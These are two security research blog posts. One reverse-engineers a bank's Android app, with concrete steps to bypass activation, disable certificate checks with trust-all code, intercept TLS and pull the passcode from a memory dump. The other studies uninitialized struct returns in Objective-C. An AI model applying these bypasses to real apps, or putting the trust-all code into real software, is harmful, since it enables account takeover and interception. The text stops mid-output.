INSIGHTS | November 7, 2012

Hacking an Android Banking Application

This analysis of a mobile banking application from X bank illustrates how easily anyone with sufficient knowledge can install and analyze the application, bypassing common protections.

 

1. Installing and unpacking the application

 

Only users located in Wonderland can install the X Android application from Google Play, which uses both the phone's SIM card and IP address to determine the location of the device. To bypass this limitation, remove the SIM card and reset the phone to factory defaults.

 

Complete the initial Android setup with a Wonderland IP address, using an L2TP VPN service (PPTP encryption support is broken). If Google Play recognizes the device as located in Wonderland, install the application. Once installed on a rooted phone, copy the application APK from /data/app/com.X.mobile.android.X.apk.

 

These are some of the many reversing tools for unpacking and decompiling the APK package:

 

   apktool        http://code.google.com/p/android-apktool/
   smali/baksmali http://code.google.com/p/smali/
   dex2jar        http://code.google.com/p/dex2jar/
   jd-gui         http://java.decompiler.free.fr/?q=jdgui
   apkanalyser    https://github.com/sonyericssondev
 

In this example, the code was decompiled using jd-gui after converting the APK file to a jar with the dex2jar tool. The source code produced by jd-gui from Android binary files is not perfect, but it is a good reference. The output produced by the baksmali tool is more accurate but harder to read. The smali code was modified and re-assembled to produce modified versions of the application with the restrictions removed. A combination of decompiled code review, code patching, and network traffic interception was used to analyze the application.
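For reference, a typical pass over the APK with these tools looks roughly like this (a sketch; exact script names vary between tool versions):

   apktool d com.X.mobile.android.X.apk out/
   dex2jar.sh com.X.mobile.android.X.apk
   jd-gui com.X.mobile.android.X_dex2jar.jar

The first command decodes the resources and disassembles the DEX bytecode to smali; the second converts the classes to a standard jar, which jd-gui can then decompile into approximate Java source.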

 

 

2. Bypassing the SMS activation

 

The application, when started for the first time, asks for a Wonderland mobile number. Activating a new account requires an activation code sent by SMS. We tested three different ways to bypass these restrictions, two of which worked. We were also able to use parts of the application without a registered account.

 

2.1 Intercepting and changing the activation code HTTPS request

 

The app GUI only accepts cell phone numbers with the 0X prefix and always adds the +XX prefix before requesting an activation code from the web service at https://android.X.com/activationCode.

 

Intercepting the request and changing the phone number didn’t work, because the phone prefix is verified on the server side.

 

 

2.2 Editing shared preferences

 

The app uses the "Shared Preferences" Android service to store its minimal configuration. The configuration can easily be modified on a rooted phone by editing the file

 

/data/data/com.X.mobile.android.X/shared_prefs/preferences.xml

 

Set the “activated” preference to “true” like this:

 

<?xml version='1.0' encoding='utf-8' standalone='yes' ?>

<map>
<boolean name="welcome_screen_viewed" value="true" />
<string name="msisdn">09999996666</string>
<boolean name="user_notified" value="true" />
<boolean name="activated" value="true" />
<string name="guid" value="" />
<boolean name="passcode_set" value="true" />
<int name="version_code" value="202" />
</map>
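On a rooted phone with adb access, one way to apply the change is to pull the file, flip the value, and push it back (a sketch; the app must be restarted to pick up the edit):

   adb pull /data/data/com.X.mobile.android.X/shared_prefs/preferences.xml
   (edit preferences.xml, setting the "activated" boolean to "true")
   adb push preferences.xml /data/data/com.X.mobile.android.X/shared_prefs/preferences.xml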

 

2.3 Starting the SetPasscode activity

 

The Android design allows the user to bypass the normal startup and directly start activities exported by applications. The decompiled code shows that the SetPasscode activity can be started after the activation code is verified. Start the SetPasscode activity using the "am" tool as follows:

 

From the adb root shell:

 

#am start -a android.intent.action.MAIN -n com.X.mobile.android.X/.activity.registration.SetPasscodeActivity

 

3. Intercepting HTTPS requests

 

To read and modify the traffic between the app and the server, perform an SSL/TLS MiTM attack. We weren't able to create a CA certificate and install it using Android's user interface on the version we used for testing; Android ignores CA certificates added by the user. Instead, we located and modified the app's HTTP client code to make it accept any certificate, then installed the modified APK file on the phone. Using iptables on the device, we could redirect all the HTTPS traffic to a MiTM proxy to intercept and modify requests sent by the application.
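The patch is equivalent to installing an all-trusting TrustManager in the app's HTTP client before any connection is made. A minimal Java sketch of the technique (illustrative code, not the app's actual classes):

import java.security.SecureRandom;
import java.security.cert.X509Certificate;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;

public class TrustAllCerts {
    public static void install() throws Exception {
        // A TrustManager that accepts every certificate chain without checking it.
        TrustManager[] trustAll = {
            new X509TrustManager() {
                public void checkClientTrusted(X509Certificate[] chain, String authType) {}
                public void checkServerTrusted(X509Certificate[] chain, String authType) {}
                public X509Certificate[] getAcceptedIssuers() { return new X509Certificate[0]; }
            }
        };
        SSLContext ctx = SSLContext.getInstance("TLS");
        ctx.init(null, trustAll, new SecureRandom());
        // Every HttpsURLConnection created after this call skips certificate validation.
        HttpsURLConnection.setDefaultSSLSocketFactory(ctx.getSocketFactory());
    }
}

With validation disabled, an on-device redirect rule along the lines of iptables -t nat -A OUTPUT -p tcp --dport 443 -j DNAT --to-destination <proxy-ip>:8080 sends the traffic to the intercepting proxy.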

 

4. Data storage

 

The app doesn't store any data on external storage (SD card), and it doesn't use the SQLite database. Preferences are stored in the "Shared Preferences" XML file. Access to the preferences is restricted to the application. During a review of the decompiled code, we didn't find any evidence of sensitive information being stored in the shared preferences.

 

 

5. Attack scenario: Device compromised while the app is running

 

The X Android application doesn't store sensitive information on the device. In the event of theft, loss, or remote penetration, the auto-lockout mechanism reduces the risk of unauthorized use of the running application. When the app is not being used or is running in the background, the screen is locked and the passcode must be entered to initiate a new session. The HTTPS session cookie expires after 300 seconds. The current session cookie is removed from memory when the application is locked.

 

5.1 Attacker with root privileges

 
An attacker with root access to the device can obtain the GUID and phone number from the unencrypted XML configuration file; but without the clear-text or encrypted passcode, the mobile banking web services cannot be accessed. We discovered a way to "unlock" the application using the Android framework to start the AccountsFragmentActivity activity, but if the web session has already expired, the app limits the attacker to read-only access. The most profitable path for the attacker at this point is a memory dump of the running process, as we explain in the next section.
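By analogy with the SetPasscode trick from section 2.3, the "unlock" amounts to starting the activity directly; the component path below is illustrative, with the real one taken from the decompiled manifest:

#am start -a android.intent.action.MAIN -n com.X.mobile.android.X/.activity.AccountsFragmentActivity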

5.2 Memory dump analysis

An attacker who gets root access can acquire the memory of a running Android application in several different ways. “Acquisition and Analysis of Volatile Memory from Android Devices,” published in the Digital Investigation Journal, describes some of the different methods.

 

We used the ddms (Dalvik Debug Monitor Server) tool included with the Android SDK to acquire the memory dump. The Eclipse Memory Analyzer tool, with its Object Query Language support, is one of the most powerful ways to explore the application memory. The application passcodes are short numeric strings, so a simple search using regular expressions returns too many occurrences. The attacker can't try every occurrence of a numeric string in the process memory as a passcode for the app web services, because the account is blocked after a few attempts. The HTTPS session cookies are longer strings and easier to find.

 

By searching for the prefix "JSESSION," the attacker can easily locate the cookies while the application is running and active. However, the cookies are removed from memory after a timeout: the ActivityTimeoutTracker function calls the clear() method of the HashMap used to store the cookies. The cookie HashMap is accessed through the singleton class com.X.a.a.e.b.
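In the Eclipse Memory Analyzer, that search can be expressed directly in OQL (a sketch; MAT's LIKE operator takes a regular expression):

SELECT toString(s) FROM java.lang.String s WHERE toString(s) LIKE "JSESSION.*"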

 

 

Reviewing the decompiled code, we located a variable where the passcode is stored before being encrypted to perform the session initiation request. The field String f of the class com.X.a.a.d.a contains the passcode, and it is never overwritten or released. The references to the instance prevent the garbage collection of the string. Executing the OQL query “SELECT toString(object.f) FROM com.X.a.a.d.a object” inside the Eclipse Memory Analyzer is sufficient to reliably locate the passcode in the application memory dump.

 

Although developers tried to remove information from the memory to prevent this type of attack, they left the most important piece of information unprotected.


6. Attack scenario: Perform MiTM using a compromised CA

 

The banking application validates certificates against all the CA certificates that ship with Android. Any single compromised CA in the system key store can potentially compromise communication between the app and the backend. An active network attacker can hijack the connection between the mobile app and the server to impersonate the user.

 

Mobile apps making SSL/TLS connections to a service controlled by the vendor don't need to trust Certificate Authority signatures at all. The app could instead implement certificate "pinning," or distribute a signing certificate created by the vendor.
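A pinned trust check can be as small as comparing a digest of the server certificate against a value embedded in the app. A minimal Java sketch of the idea (the pinned digest below is a placeholder for the real certificate's hash):

import java.security.MessageDigest;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import java.util.Arrays;
import javax.net.ssl.X509TrustManager;

public class PinnedTrustManager implements X509TrustManager {
    // SHA-256 of the vendor's server certificate, shipped inside the app.
    private static final byte[] PINNED_SHA256 = { /* placeholder */ };

    public void checkServerTrusted(X509Certificate[] chain, String authType)
            throws CertificateException {
        try {
            byte[] actual = MessageDigest.getInstance("SHA-256").digest(chain[0].getEncoded());
            if (!Arrays.equals(PINNED_SHA256, actual)) {
                throw new CertificateException("certificate does not match pinned value");
            }
        } catch (java.security.NoSuchAlgorithmException e) {
            throw new CertificateException(e);
        }
    }

    public void checkClientTrusted(X509Certificate[] chain, String authType)
            throws CertificateException {
        throw new CertificateException("client certificates not expected");
    }

    public X509Certificate[] getAcceptedIssuers() {
        return new X509Certificate[0]; // no CA trust needed; the pin is the trust anchor
    }
}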

 

The authentication protocol is vulnerable to MiTM attacks. The app's authentication protocol uses the RSA and 3DES algorithms to encrypt the passcode before sending it to the server. After the user types the passcode and presses the "login" button, the client retrieves an RSA public key from the server without any authenticity check, which allows for an MiTM attack. We were able to implement the attack and capture passcodes from the app in our testing environment. Although the authentication protocol implemented by the app is insecure, attacks are prevented by the requirement of SSL/TLS for every request. Once someone bypasses the SSL/TLS certificate verification, though, the encryption of the passcode doesn't provide extra protection.

 

 

7. Attack scenario: Enumerate users

 

The web service API allows user enumeration. With a simple JSON request, attackers can determine whether a given phone number is using the service, and then use this information to guess passcodes or mount social engineering attacks.
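The exchange has roughly the following shape (the endpoint and field names here are hypothetical, reconstructed only to illustrate the class of problem):

POST /userExists HTTP/1.1
Host: android.X.com
Content-Type: application/json

{"msisdn": "+XX9999996666"}

HTTP/1.1 200 OK
Content-Type: application/json

{"registered": true}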

 

About Juliano

 

Juliano Rizzo has been involved in computer security for more than 12 years, working on vulnerability research, reverse engineering, and development of high quality exploits for bugs of all classes. As a researcher he has published papers, security advisories, and tools. His recent work includes the ASP.NET “padding oracle” exploit, the BEAST attack, and the CRIME attack. Twitter: @julianor

 

 

INSIGHTS | November 2, 2012

iOS Security: Objective-C and nil Pointers

iOS devices are everywhere now. It seems that pretty much every other person has one…an iPhone, iPad or iPod touch – and they’re rivaled in popularity only by Android devices.

If you do secure code review, chances are that with the explosion in the number of iOS apps, you may well have done a source code review of an iOS app, or at least played around with some Objective-C code. Objective-C can be a little strange at first for those of us who are used to plain C and C++ (i.e. all the square brackets!), and even stranger for Java coders, but after a while most of us realise that the standard iOS programming environment is packed with some pretty powerful Cocoa APIs, and that Objective-C itself has some cool features as well. The runtime also supports a number of quirky features, which people tend to learn shortly after the standard "Hello, World!" stuff…

Objective-C brings a few of its own concepts and terminology into the mix as well. Using Objective-C syntax, we might call a simple method taking one integer parameter like this:

returnVal = [someObject myMethod:1234];

In other object-oriented languages like C++ and Java, we'd normally just refer to this as "calling a member function" or "calling a method", or even "calling a method on an object". However, Objective-C differs slightly in this respect: you do not call methods – instead, you "send a message to an object". This concept as a whole is known as 'message passing'.

The net result is the same – the 'myMethod' method associated with someObject's class is called – but the semantics of how the runtime calls the method are somewhat different from how a C++ runtime would.

Whenever the ObjC compiler sees a line of code such as "[someObject myMethod]", it inserts a call to one of the objc_msgSend(_XXX) APIs with the "receiver" (someObject) and the "selector" ("myMethod:") as parameters to the function. This family of functions will, at runtime, figure out which piece of code needs to be executed given the object's class, and then eventually JMPs to it. This might seem a bit long-winded, but since the correct method to call is determined at runtime, it is part of how Objective-C gets its dynamism.

The call above may end up looking something roughly like this, after the compiler has dealt with it:

objc_msgSend(someObject, "myMethod:", 1234);

The version of objc_msgSend that is actually called depends on the return type of the method being called, so accordingly there are a few versions of the interface in the objc_msgSend family: objc_msgSend() (for most return types), objc_msgSend_fpret() (for floating-point return values), and objc_msgSend_stret() (for when the called method returns a struct type).

But what happens if you attempt to message a nil object pointer? Everyone who plays around with Objective-C code long enough soon realises that calling a method on a nil object pointer – or, more correctly, “messaging” a nil object pointer – is perfectly valid. So for example:

someObject = nil;
[someObject myMethod];

is absolutely fine. No segmentation fault – nothing. This is a very deliberate feature of the runtime, and many ObjC developers in fact use this feature to their advantage. You may end up with a nil object pointer due to an object allocation failure (out of memory), or some failure to find a substring inside a larger string, for example…

i.e.

 MyClass *myObj = [[MyClass alloc] init]; // out-of-memory conditions give myObj == nil

In any case, however an object pointer got to be nil, there are certain coding styles that allow a developer to use this feature perfectly harmlessly, and even for profit. However, there are also ways that too-liberal use of the feature can lead to bugs – both functionally and security-wise.

One thing that needs to be considered is: what do the objc_msgSend variants return if the object pointer was indeed found to be nil? That is, we have

 myObj = nil;
someVariable = [myObj someMethod];

What will someVariable be equal to? Many developers assume it will always be some form of zero – and often they would be correct – but the true answer actually depends on the type of value that someMethod is defined to return. Quoting from Apple's API documentation:

“””
– If the method returns any pointer type, any integer scalar of size less than or equal to sizeof(void*), a float, a double, a long double, or a long long, then a message sent to nil returns 0.

– If the method returns a struct, as defined by the OS X ABI Function Call Guide to be returned in registers, then a message sent to nil returns 0.0 for every field in the struct. Other struct data types will not be filled with zeros.

– If the method returns anything other than the aforementioned value types, the return value of a message sent to nil is undefined.
“””

The second rule above looks interesting. It deals with methods that return struct types, for which the objc_msgSend() variant called is the objc_msgSend_stret() interface. What the description is basically saying is: if the struct return type is larger than the width of the architecture's registers (i.e. it must be returned via the stack), and we call a struct-returning method on a nil object pointer, the ObjC runtime does NOT guarantee that our structure will be zeroed out after the call. Instead, the contents of the struct are undefined!

When structures to be "returned" are larger than the width of a register, objc_msgSend_stret() works by writing the return value into the memory area specified by the pointer passed to it. If we take a look at Apple's ARM implementation of objc_msgSend_stret() in the runtime[1], which is coded in pure assembly, we can see that the API indeed does nothing to guarantee us a nicely 0-initialized struct return value:

/********************************************************************
* struct_type    objc_msgSend_stret(id    self,
*                SEL    op,
*                    …);
*
* objc_msgSend_stret is the struct-return form of msgSend.
* The ABI calls for a1 to be used as the address of the structure
* being returned, with the parameters in the succeeding registers.
*
* On entry: a1 is the address where the structure is returned,
*           a2 is the message receiver,
*           a3 is the selector
********************************************************************/

ENTRY objc_msgSend_stret
# check whether receiver is nil
teq     a2, #0
bxeq    lr

If the object pointer was nil, the function just exits…no memset()'ing to zero – nothing – and the "return value" of objc_msgSend_stret() in this case will effectively be whatever was already there in that place on the stack, i.e. uninitialized data.

Although I'll expand more later on the possible security consequences of getting undefined struct contents back, most security people are aware that undefined/uninitialized data can lead to some interesting security bugs (uninitialized pointer dereferences, information leaks, etc.).

So, let's suppose that we have a method 'myMethod' in MyClass that returns a struct, an object pointer of type MyClass that is equal to nil (i.e. some earlier operation failed), and we accidentally attempt to call myMethod on the nil pointer:

struct myStruct {
int myInt;
int otherInt;
float myFloat;
char myBuf[20];
};

[ … ]

struct myStruct returnStruct;

myObj = nil;
returnStruct = [myObj myMethod];

Does that mean we should definitely expect returnStruct, if we’re running on our ARM-based iPhone, to be full of uninitialized junk?

Not always. That depends on what compiler you’re using, and therefore, in pragmatic terms, what version of Xcode the iOS app was compiled in.

If the iOS app was compiled in Xcode 4.0 or earlier, where the default compiler is GCC 4.2[2], messaging nil with struct return methods does indeed result in undefined structure contents, since there is nothing in the runtime nor the compiler-generated assembly code to zero out the structure in the nil case.

However, if the app was compiled with LLVM-GCC 4.2 (Xcode 4.1) or Apple LLVM (circa Xcode 4.2), the compiler inserts assembly code that does a nil check followed by a memset(myStruct, 0x00, sizeof(*myStruct)) if the object pointer was indeed nil, adjacent to all objc_msgSend_stret() calls.

Therefore, if the app was compiled in Xcode 4.1 or later (LLVM-GCC 4.2 or Apple LLVM), messaging nil is *guaranteed* to *always* result in zeroed-out structures upon return – so long as the default compiler for that Xcode release is used. Otherwise, i.e. with Xcode 4.0, the struct contents are completely undefined.
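In other words, the newer compilers wrap every struct-returning message send in logic roughly equivalent to the following (a sketch of the generated code path, not the literal assembly):

struct teststruct ret;
if (myObj == nil) {
    memset(&ret, 0x00, sizeof(ret));  /* compiler-inserted zeroing on the nil path */
} else {
    objc_msgSend_stret(&ret, myObj, @selector(sayHello));  /* normal dispatch */
}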

These two cases become apparent by comparing the disassemblies for calls to objc_msgSend_stret() as generated by 1) GCC 4.2, and 2) Apple LLVM. See the IDA Pro screen dumps below.

 Figure 1 – objc_msgSend_stret() with GCC 4.2

Figure 2 – objc_msgSend_stret() with Apple LLVM

Figure 1 clearly shows objc_msgSend_stret() being called whether the object pointer is nil or not; upon return from the function, memcpy() is used to copy the "returned" struct data into the place we asked the structure to be returned to, i.e. our struct on the stack. If the object pointer was nil, objc_msgSend_stret() just exits, and ultimately this memcpy() ends up filling our structure with whatever happened to be on the stack at the time…

In Figure 2, on the other hand, we see that the ARM 'CBZ' instruction is used to test the object pointer against 0 (nil) before the objc_msgSend_stret() call, with the memset()-to-0 code path instead being taken if the pointer was indeed nil. This guarantees that in the case of the object pointer being nil, the structure will be completely zeroed.

Thus, summed up, any iOS applications released before July 2011 are extremely likely to be vulnerable, since they were almost certainly compiled with GCC. Apps built with Xcode 4.1 and later are most likely not vulnerable. But bear in mind that a great many developers in real-world jobs do not update their IDE straight away, regularly, or even at all (ever heard of corporate policy?). By all accounts, it's probable that vulnerable apps (i.e. built with Xcode 4.0) are still being released on the App Store today.

It's quite easy to experiment with this yourself with a bit of test code. Let's write some code that demonstrates the entire issue. We can define a class called HelloWorld containing one method that returns a 'struct teststruct' value; the method simply puts a ton of recognisable data into an instance of 'teststruct' before returning it. The files in the class definition look like this:

hello.m

#import "hello.h"

@implementation HelloWorld

- (struct teststruct)sayHello
{
// NSLog(@"Hello, world!!\n\n");

struct teststruct testy;
testy.testInt = 1337;
testy.testInt2 = 1338;
testy.inner.test1 = 1337;
testy.inner.test2 = 1337;

testy.testInt3 = 1339;
testy.testInt4 = 1340;
testy.testInt5 = 1341;
testy.testInt6 = 1341;
testy.testInt7 = 1341;
testy.testInt8 = 1341;
testy.testInt9 = 1341;
testy.testInt10 = 1341;
testy.testFloat = 1337.0;
testy.testFloat1 = 1338.1;
testy.testLong1 = 1337;
testy.testLong2 = 1338;

strcpy((char *)&testy.testBuf, "hello world\n");

return testy;
}

@end

hello.h

#import <Foundation/Foundation.h>

@interface HelloWorld : NSObject {
// no instance variables
}

// methods
- (struct teststruct)sayHello;

@end

struct teststruct {
int testInt;
int testInt2;

struct {
int test1;
int test2;
} inner;

int testInt3;
int testInt4;
int testInt5;
int testInt6;
int testInt7;
int testInt8;
int testInt9;
int testInt10;
float testFloat;
float testFloat1;
long long testLong1;
long long testLong2;
char testBuf[20];

};

We can then write a bit of code in main() that allocates and initializes an object of class HelloWorld, calls sayHello, and prints the values it received back. Then, let’s set the object pointer to nil, attempt to call sayHello on the object pointer again, and then print out the values in the structure that we received that time around. We’ll use the following code:

#import <UIKit/UIKit.h>
#import <malloc/malloc.h>
#import "AppDelegate.h"
#import "hello.h"
#import "test.h"
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
struct teststruct testStructure1;
struct teststruct testStructure2;
struct teststruct testStructure3;
struct otherstruct otherStructure;

HelloWorld *hw = [[HelloWorld alloc] init];
TestObj *otherObj = [[TestObj alloc] init];

testStructure1 = [hw sayHello];

/* what did sayHello return? */
NSLog(@"\nsayHello returned:\n");
NSLog(@"testInt = %d\n", testStructure1.testInt);
NSLog(@"testInt = %d\n", testStructure1.testInt2);
NSLog(@"testInt = %d\n", testStructure1.testInt3);
NSLog(@"testInt = %d\n", testStructure1.testInt4);
NSLog(@"testInt = %d\n", testStructure1.testInt5);
NSLog(@"testInt = %d\n", testStructure1.testInt6);
NSLog(@"testInt = %d\n", testStructure1.testInt7);
NSLog(@"testInt = %d\n", testStructure1.testInt8);
NSLog(@"testInt = %d\n", testStructure1.testInt9);
NSLog(@"testInt = %d\n", testStructure1.testInt10);
NSLog(@"testInt = %5.3f\n", testStructure1.testFloat);
NSLog(@"testInt = %5.3f\n", testStructure1.testFloat1);
NSLog(@"testInt = %d\n", testStructure1.testLong1);
NSLog(@"testInt = %d\n", testStructure1.testLong2);
NSLog(@"testBuf = %s\n", testStructure1.testBuf);

/* clear the struct again */
memset((void *)&testStructure1, 0x00, sizeof(struct teststruct));
hw = nil;  // nil object ptr
testStructure1 = [hw sayHello];  // message nil

/* what are the contents of the struct after messaging nil? */
NSLog(@"\n\nafter messaging nil, sayHello returned:\n");
NSLog(@"testInt = %d\n", testStructure1.testInt);
NSLog(@"testInt = %d\n", testStructure1.testInt2);
NSLog(@"testInt = %d\n", testStructure1.testInt3);
NSLog(@"testInt = %d\n", testStructure1.testInt4);
NSLog(@"testInt = %d\n", testStructure1.testInt5);
NSLog(@"testInt = %d\n", testStructure1.testInt6);
NSLog(@"testInt = %d\n", testStructure1.testInt7);
NSLog(@"testInt = %d\n", testStructure1.testInt8);
NSLog(@"testInt = %d\n", testStructure1.testInt9);
NSLog(@"testInt = %d\n", testStructure1.testInt10);
NSLog(@"testInt = %5.3f\n", testStructure1.testFloat);
NSLog(@"testInt = %5.3f\n", testStructure1.testFloat1);
NSLog(@"testInt = %d\n", testStructure1.testLong1);
NSLog(@"testInt = %d\n", testStructure1.testLong2);
NSLog(@"testBuf = %s\n", testStructure1.testBuf);
}

OK – let's first test it on my developer-provisioned iPhone 4S, compiling it in Xcode 4.0 – i.e. with GCC 4.2, since that is Xcode 4.0's default iOS compiler. What do we get?

2012-11-01 21:12:36.235 sqli[65340:b303]
sayHello returned:
2012-11-01 21:12:36.237 sqli[65340:b303] testInt = 1337
2012-11-01 21:12:36.238 sqli[65340:b303] testInt = 1338
2012-11-01 21:12:36.238 sqli[65340:b303] testInt = 1339
2012-11-01 21:12:36.239 sqli[65340:b303] testInt = 1340
2012-11-01 21:12:36.239 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.240 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.241 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.241 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.242 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.243 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.244 sqli[65340:b303] testInt = 1337.000
2012-11-01 21:12:36.244 sqli[65340:b303] testInt = 1338.100
2012-11-01 21:12:36.245 sqli[65340:b303] testInt = 1337
2012-11-01 21:12:36.245 sqli[65340:b303] testInt = 1338
2012-11-01 21:12:36.246 sqli[65340:b303] testBuf = hello world

2012-11-01 21:12:36.246 sqli[65340:b303]

after messaging nil, sayHello returned:
2012-11-01 21:12:36.247 sqli[65340:b303] testInt = 1337
2012-11-01 21:12:36.247 sqli[65340:b303] testInt = 1338
2012-11-01 21:12:36.248 sqli[65340:b303] testInt = 1339
2012-11-01 21:12:36.249 sqli[65340:b303] testInt = 1340
2012-11-01 21:12:36.249 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.250 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.250 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.251 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.252 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.252 sqli[65340:b303] testInt = 1341
2012-11-01 21:12:36.253 sqli[65340:b303] testInt = 1337.000
2012-11-01 21:12:36.253 sqli[65340:b303] testInt = 1338.100
2012-11-01 21:12:36.254 sqli[65340:b303] testInt = 1337
2012-11-01 21:12:36.255 sqli[65340:b303] testInt = 1338
2012-11-01 21:12:36.256 sqli[65340:b303] testBuf = hello world

Quite as we expected, we end up with a struct full of what was already there in the return position on the stack – and this just happened to be the return value from the last call to sayHello. In a complex app, the value would be somewhat unpredictable.

And now let’s compile and run it on my iPhone using Xcode 4.5, where I’m using its respective default compiler – Apple LLVM. The output:

2012-11-01 21:23:59.561 sqli[65866:b303]
sayHello returned:
2012-11-01 21:23:59.565 sqli[65866:b303] testInt = 1337
2012-11-01 21:23:59.566 sqli[65866:b303] testInt = 1338
2012-11-01 21:23:59.566 sqli[65866:b303] testInt = 1339
2012-11-01 21:23:59.567 sqli[65866:b303] testInt = 1340
2012-11-01 21:23:59.568 sqli[65866:b303] testInt = 1341
2012-11-01 21:23:59.569 sqli[65866:b303] testInt = 1341
2012-11-01 21:23:59.569 sqli[65866:b303] testInt = 1341
2012-11-01 21:23:59.570 sqli[65866:b303] testInt = 1341
2012-11-01 21:23:59.571 sqli[65866:b303] testInt = 1341
2012-11-01 21:23:59.572 sqli[65866:b303] testInt = 1341
2012-11-01 21:23:59.572 sqli[65866:b303] testInt = 1337.000
2012-11-01 21:23:59.573 sqli[65866:b303] testInt = 1338.100
2012-11-01 21:23:59.574 sqli[65866:b303] testInt = 1337
2012-11-01 21:23:59.574 sqli[65866:b303] testInt = 1338
2012-11-01 21:23:59.575 sqli[65866:b303] testBuf = hello world

2012-11-01 21:23:59.576 sqli[65866:b303]

after messaging nil, sayHello returned:
2012-11-01 21:23:59.577 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.577 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.578 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.578 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.579 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.579 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.580 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.581 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.581 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.582 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.582 sqli[65866:b303] testInt = 0.000
2012-11-01 21:23:59.673 sqli[65866:b303] testInt = 0.000
2012-11-01 21:23:59.673 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.674 sqli[65866:b303] testInt = 0
2012-11-01 21:23:59.675 sqli[65866:b303] testBuf =

Also just as we expected: the Apple LLVM-built version gives us all-zeroed struct fields, since the compiler-inserted memset() call guarantees a zeroed struct when we message nil.

Now, to be pragmatic, what are some potential security consequences of us getting junk, uninitialized data back, in real-world applications?

One possible scenario is a method, say returnDataEntry, that returns a struct containing some data and a pointer. We could make the scenario more detailed, but for argument's sake let's just assume the structure holds some data and a pointer to some more data.

Consider the following code fragment, in which the developer knows they'll receive a zeroed structure from returnDataEntry if the someFunctionThatCanFail() call fails:

 struct someData {
int someInt;
char someData[50];
void *myPointer;
};

[ … ]

- (struct someData)returnDataEntry
{

struct someData myData;
memset((void *)&myData, 0x00, sizeof(struct someData)); /* zero it out */

if(!someFunctionThatCanFail()) {  /* can fail! */
/* something went wrong, return the zeroed struct */
return myData;
}

/* otherwise do something useful */
myData = someUsefulDataFunction();
return myData;
}

In the error case, the developer knows that they can check the contents of the struct against 0 and therefore know if returnDataEntry ran successfully.

i.e.

myData = [myObj returnDataEntry];
if(myData.myPointer == NULL) {
/* the method failed */
}

/* otherwise, use the data and pointer */

However, if we suppose that the 'myObj' pointer was nil at the time of the returnDataEntry call, and our app was built with a vulnerable version of Xcode, the returned structure will be uninitialized, and myData.myPointer could be absolutely anything; at this point, we have a dangling pointer and, therefore, a security bug.

Equally, what if some method is declared to return a structure, and that data is later sent to a remote server over the network? A scenario like this could easily result in information leaks, and it’s easy to see how that’s bad.

Lastly – and this is also quite interesting – let's consider some Cocoa APIs that take structs and process them. We'll take a bog-standard structure – NSDecimal, for example. The NSDecimal structure is defined as:

typedef struct {
signed   int _exponent:8;
unsigned int _length:4;     // length == 0 && isNegative -> NaN
unsigned int _isNegative:1;
unsigned int _isCompact:1;
unsigned int _reserved:18;
unsigned short _mantissa[NSDecimalMaxSize];
} NSDecimal;

It's pretty obvious from those underscores that all fields in NSDecimal are 'private' – that is, they should not be directly used or modified, and their semantics are subject to change if Apple sees fit. As such, NSDecimal structures should only be used and manipulated using the official NSDecimal APIs. There's even a length field, which could be interesting.

The fact that all fields in NSDecimal are documented as being private[3] starts to make me wonder whether the NSDecimal APIs are actually safe to call on malformed NSDecimal structs. Let’s test that theory out.

Let’s assume we got a garbage NSDecimal structure back from messaging a nil object at some earlier point in the app, and then we pass this NSDecimal struct to Cocoa’s NSDecimalString() API. We could simulate the situation with a bit of code like this:

NSDecimal myDecimal;

/* fill the structure with bad data */
memset(&myDecimal, 0x99, sizeof(NSDecimal));

NSLocale *usLocale = [[NSLocale alloc] initWithLocaleIdentifier:@"en_US"];

NSDecimalString(&myDecimal, usLocale);

What happens?

If we quickly run this in the iOS Simulator (x86), we crash with a write access violation at the following line in NSDecimalString():

<+0505>  mov    %al,(%esi,%edx,1)

(gdb) info reg esi edx
esi            0xffffffca    -54
edx            0x38fff3f4    956298228

Something has clearly gone wrong here, since there’s no way that address is going to be mapped and writable…

It turns out that the above line of assembly is part of a loop that uses length values derived from the invalid values in our NSDecimal struct. Let's set a breakpoint at the line above the crashing line, and see what things look like at the first hit of the breakpoint, and then at crash time.

0x008f4275  <+0499>  mov    -0x11c(%ebp),%edx
0x008f427b  <+0505>  mov    %al,(%esi,%edx,1)

(gdb) x/x $ebp-0x11c
0xbffff3bc:    0xbffff3f4

So 0xbffff3f4 is the base address of where the loop is copying data to. And after the write AV, i.e. at crash time, the base pointer looks like:

(gdb) x/x $ebp-0x11c
0xbffff3bc:    0x38fff3f4
(gdb)

Thus, after a little analysis, it becomes apparent that the root cause of the crash is stack corruption – the most significant byte of the base destination address is overwritten (with a 0x38 byte) on the stack during the loop. This at least nods towards several Cocoa APIs not being designed to deal with malformed structs with "private" fields. There are likely to be more such cases, considering the sheer size of Cocoa.

Although NSDecimalString() is where the crash occurred, I wouldn't really consider this a bug in the API per se, since it is well documented that members of NSDecimal structs are private. This could be considered akin to memory corruption bugs caused by misuse of strcpy() – the bug isn't really in the API as such, since it's doing what it was designed to do; it's the manner in which you used it that constitutes a bug.

Interestingly, it seems to be possible to detect which compiler an app was built with by running a strings dump on the Info.plist file found in an app’s IPA bundle.

Apple LLVM

sh-3.2# strings Info.plist | grep compiler
"com.apple.compilers.llvm.clang.1_0

